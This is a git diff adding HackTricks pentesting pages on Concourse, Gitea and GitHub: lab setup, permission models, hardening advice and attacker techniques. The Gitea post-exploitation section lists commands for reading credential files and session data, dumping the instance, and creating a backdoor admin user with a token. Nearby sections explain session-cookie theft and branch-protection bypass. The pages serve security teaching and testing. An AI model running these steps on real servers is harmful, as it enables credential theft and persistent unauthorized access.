+DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1.
+Host: 127.0.0.1:7777.
+User-Agent: Go-http-client/1.1.
+Accept-Encoding: gzip.
+```
+
+## References
+
+* https://concourse-ci.org/vars.html
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
new file mode 100644
index 0000000000..2e65c7407d
--- /dev/null
+++ b/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
@@ -0,0 +1,177 @@
+# Concourse Lab Creation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Testing Environment
+
+### Running Concourse
+
+#### With Docker-Compose
+
+This docker-compose file simplifies the installation to do some tests with concourse:
+
+```bash
+wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
+docker-compose up -d
+```
+
+You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
+
+#### With Kubernetes (Recommended)
+
+You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
+
+```bash
+brew install helm
+helm repo add concourse https://concourse-charts.storage.googleapis.com/
+helm install concourse-release concourse/concourse
+# concourse-release will be the prefix name for the concourse elements in k8s
+# After the installation you will find the indications to connect to it in the console
+
+# If you need to delete it
+helm delete concourse-release
+```
+
+After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
+
+```yaml
+echo 'apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: read-secrets
+rules:
+- apiGroups: [""]
+  resources: ["secrets"]
+  verbs: ["get"]
+
+---
+
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: read-secrets-concourse
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: read-secrets
+subjects:
+- kind: ServiceAccount
+  name: concourse-release-web
+  namespace: default
+  
+---
+
+apiVersion: v1
+kind: Secret
+metadata:
+  name: super
+  namespace: concourse-release-main
+type: Opaque
+data:
+  secret: MWYyZDFlMmU2N2Rm
+
+' | kubectl apply -f -
+```
+
+### Create Pipeline
+
+A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
+
+### Steps
+
+Several different type of steps can be used:
+
+* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
+* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
+* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
+* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
+* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
+* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
+* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
+* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
+* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
+
+Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
+
+Therefore, it's possible to indicate the type of container each step needs to be run in.
+
+### Simple Pipeline Example
+
+```yaml
+jobs:
+- name: simple
+  plan:
+  - task: simple-task
+    privileged: true
+    config:
+      # Tells Concourse which type of worker this task should run on
+      platform: linux
+      image_resource:
+        type: registry-image
+        source:
+          repository: busybox # images are pulled from docker hub by default
+      run:
+        path: sh
+        args:
+        - -cx
+        - |
+          sleep 1000
+          echo "$SUPER_SECRET"
+      params:
+        SUPER_SECRET: ((super.secret))
+```
+
+```bash
+fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml
+# pipelines are paused when first created
+fly -t tutorial unpause-pipeline -p pipe-name
+# trigger the job and watch it run to completion
+fly -t tutorial trigger-job --job pipe-name/simple --watch
+# From another console
+fly -t tutorial intercept --job pipe-name/simple
+```
+
+Check **127.0.0.1:8080** to see the pipeline flow.
+
+### Bash script with output/input pipeline
+
+It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
+
+### Triggers
+
+You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
+
+* Some time passes: [Time resource](https://github.com/concourse/time-resource/)
+* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
+* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
+* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
+
+Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/gitea-security/README.md b/pentesting-ci-cd/gitea-security/README.md
new file mode 100644
index 0000000000..46eb21749e
--- /dev/null
+++ b/pentesting-ci-cd/gitea-security/README.md
@@ -0,0 +1,165 @@
+# Gitea Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## What is Gitea
+
+**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
+
+![](<../../.gitbook/assets/image (160).png>)
+
+### Basic Information
+
+{% content-ref url="basic-gitea-information.md" %}
+[basic-gitea-information.md](basic-gitea-information.md)
+{% endcontent-ref %}
+
+## Lab
+
+To run a Gitea instance locally you can just run a docker container:
+
+```bash
+docker run -p 3000:3000 gitea/gitea
+```
+
+Connect to port 3000 to access the web page.
+
+You could also run it with kubernetes:
+
+```
+helm repo add gitea-charts https://dl.gitea.io/charts/
+helm install gitea gitea-charts/gitea
+```
+
+## Unauthenticated Enumeration
+
+* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
+* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
+* Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
+
+Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
+
+## Internal Exploitation
+
+For this scenario we are going to suppose that you have obtained some access to a github account.
+
+### With User Credentials/Web Cookie
+
+If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
+
+Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+
+{% hint style="info" %}
+Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+{% endhint %}
+
+### With User SSH Key
+
+Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
+
+With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
+
+```bash
+# Go to the the repository folder
+# Get repo config and current user name and email
+git config --list
+```
+
+If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\<gitea\_username>.keys_, you could check this to confirm the private key you found can be used.
+
+**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+
+#### GPG Keys
+
+As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
+
+Check locally if the current user has any key with:
+
+```shell
+gpg --list-secret-keys --keyid-format=long
+```
+
+### With User Token
+
+For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
+
+A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
+
+### With Oauth Application
+
+For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application).
+
+An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+
+As explained in the basic information, the application will have **full access over the user account**.
+
+### Branch Protection Bypass
+
+In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
+
+* **Enable Push**: If anyone with write access can push to the branch, just push to it.
+* **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
+* **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
+* **Require approvals is bigger than 0**: Then... you need to compromise another user
+* **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
+* **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
+
+Note that **if you are an org/repo admin** you can bypass the protections.
+
+### Enumerate Webhooks
+
+**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
+However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
+But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
+
+Webhooks can be set at **repo and at org level**.
+
+## Post Exploitation
+
+### Inside the server
+
+If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
+
+In this file you can find **keys** and **passwords**.
+
+In the gitea path (by default: /data/gitea) you can find also interesting information like:
+
+* The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
+* The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
+* The **jwt private key** inside the jwt folder
+* More **sensitive information** could be found in this folder
+
+If you are inside the server you can also **use the `gitea` binary** to access/modify information:
+
+* `gitea dump` will dump gitea and generate a .zip file
+* `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
+* `gitea admin user change-password --username admin --password newpassword` Change the password
+* `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md
new file mode 100644
index 0000000000..b5daaad8e3
--- /dev/null
+++ b/pentesting-ci-cd/gitea-security/basic-gitea-information.md
@@ -0,0 +1,131 @@
+# Basic Gitea Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Structure
+
+The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
+
+Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
+
+A user may also be **part of different teams** with different permissions over different repos.
+
+And finally **repositories may have special protection mechanisms**.
+
+## Permissions
+
+### Organizations
+
+When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
+
+**Org admins** (owners) can select the **visibility** of the organization:
+
+* Public
+* Limited (logged in users only)
+* Private (members only)
+
+**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
+
+When creating a new team, several important settings are selected:
+
+* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
+* It's also indicated **if members can create new repos** (creator will get admin access to it)
+* The **permissions** the **members** of the repo will **have**:
+  * **Administrator** access
+  * **Specific** access:
+
+![](<../../.gitbook/assets/image (118).png>)
+
+### Teams & Users
+
+In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
+
+* Administrator
+* Write
+* Read
+
+## Gitea Authentication
+
+### Web Access
+
+Using **username + password** and potentially (and recommended) a 2FA.
+
+### **SSH Keys**
+
+You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
+
+#### **GPG Keys**
+
+You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
+
+### **Personal Access Tokens**
+
+You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
+
+### Oauth Applications
+
+Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
+
+![](<../../.gitbook/assets/image (194).png>)
+
+### Deploy keys
+
+Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
+
+## Branch Protections
+
+Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+
+The **branch protections of a repository** can be found in _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
+
+{% hint style="info" %}
+It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+{% endhint %}
+
+Different protections can be applied to a branch (like to master):
+
+* **Disable Push**: No-one can push to this branch
+* **Enable Push**: Anyone with access can push, but not force push.
+* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
+* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
+* **Enable Status checks:** Require status checks to pass before merging.
+* **Require approvals**: Indicate the number of approvals required before a PR can be merged.
+* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
+* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
+* **Block merge on official review requests**: If there official review requests it cannot be merged
+* **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
+* **Require Signed Commits**: Commits must be signed.
+* **Block merge if pull request is outdated**
+* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
+
+{% hint style="info" %}
+As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/github-security/README.md b/pentesting-ci-cd/github-security/README.md
new file mode 100644
index 0000000000..63f6124ccb
--- /dev/null
+++ b/pentesting-ci-cd/github-security/README.md
@@ -0,0 +1,273 @@
+# Github Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## What is Github
+
+(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
+
+### Basic Information
+
+{% content-ref url="basic-github-information.md" %}
+[basic-github-information.md](basic-github-information.md)
+{% endcontent-ref %}
+
+## External Recon
+
+Github repositories can be configured as public, private and internal.
+
+* **Private** means that **only** people of the **organisation** will be able to access them
+* **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
+* **Public** means that **all internet** is going to be able to access it.
+
+In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
+
+### Github Dorks
+
+Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
+
+Tools (each tool contains its list of dorks):
+
+* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
+* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
+* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
+
+### Github Leaks
+
+Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
+
+Tools (each tool contains its list of regexes):
+
+* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
+* [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog)
+* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
+* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob)
+* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets)
+* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
+* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
+
+{% hint style="warning" %}
+When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
+{% endhint %}
+
+### External Forks
+
+It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork).
+
+### Github Leaks in deleted/internal forks
+
+Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
+
+{% content-ref url="accessible-deleted-data-in-github.md" %}
+[accessible-deleted-data-in-github.md](accessible-deleted-data-in-github.md)
+{% endcontent-ref %}
+
+## Organization Hardening
+
+### Member Privileges
+
+There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
+
+* **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
+* **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
+* **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
+* **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
+  * _I couldn't find this info in the APIs response, share if you do_
+* **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
+  * _I couldn't find this info in the APIs response, share if you do_
+* **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
+  * _I couldn't find this info in the APIs response, share if you do_
+* **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
+  * _I couldn't find this info in the APIs response, share if you do_
+* **More things can be configured** in this page but the previous are the ones more security related.
+
+### Actions Settings
+
+Several security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.
+
+{% hint style="info" %}
+Note that all this configurations can also be set on each repository independently
+{% endhint %}
+
+* **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
+  * [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
+* **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
+  * _I couldn't find an API with this info, share if you do_
+* **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
+  * _I couldn't find an API with this info, share if you do_
+* **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB\_TOKEN given to running workflows.
+  * [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
+
+### Integrations
+
+_Let me know if you know the API endpoint to access this info!_
+
+* **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
+* **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
+
+## Recon & Attacks abusing credentials
+
+For this scenario we are going to suppose that you have obtained some access to a github account.
+
+### With User Credentials
+
+If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
+
+Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+
+{% hint style="info" %}
+Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+{% endhint %}
+
+Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
+
+### With User SSH Key
+
+Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
+
+With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
+
+```bash
+# Go to the the repository folder
+# Get repo config and current user name and email
+git config --list
+```
+
